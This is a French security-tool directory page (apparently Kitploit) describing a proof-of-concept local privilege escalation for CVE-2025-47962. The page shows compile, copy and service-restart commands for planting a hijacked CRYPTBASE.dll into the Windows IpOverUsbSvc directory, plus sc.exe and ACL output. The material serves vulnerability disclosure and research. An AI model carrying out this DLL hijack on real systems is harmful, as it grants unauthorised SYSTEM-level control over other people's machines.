Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47962-POC — Preuve de concept pour CVE-2025-47962 démontrant une élévation de privilèges locale via le détournement de DLL dans le service Windows IpOverUsbSvc en raison de permissions de répertoire non sécurisées. | Kitploit
Outils/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralExploitation de Binaires
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

Preuve de concept pour CVE-2025-47962 démontrant une élévation de privilèges locale via le détournement de DLL dans le service Windows IpOverUsbSvc en raison de permissions de répertoire non sécurisées.

Voir le dépôt
41il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-47962-POC

Processus de reproduction : i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc 图片

Explication : IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

S'exécute avec les privilèges LocalSystem. L'exécutable se trouve dans le répertoire C:\Microsoft Shared, sur lequel les utilisateurs standard possèdent des droits de contrôle total. Il a été découvert que les utilisateurs ordinaires peuvent écrire des fichiers dans le répertoire de service SYSTEM. Puis surveiller la DLL 图片 图片 图片

Les autorisations du répertoire C:\Microsoft Shared\ créé lors de l'installation du SDK Windows sont mal configurées :

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
Télécharger l’outil